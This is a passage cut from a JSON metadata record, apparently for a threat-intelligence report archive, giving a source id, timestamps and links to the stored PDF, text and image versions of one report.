"source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434736, "ts_updated_at": 1775826790, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/855088aa14275eb4898176957ec27fe16012255c.pdf", "text": "https://archive.orkl.eu/855088aa14275eb4898176957ec27fe16012255c.txt", "img": "https://archive.orkl.eu/855088aa14275eb4898176957ec27fe16012255c.jpg" } }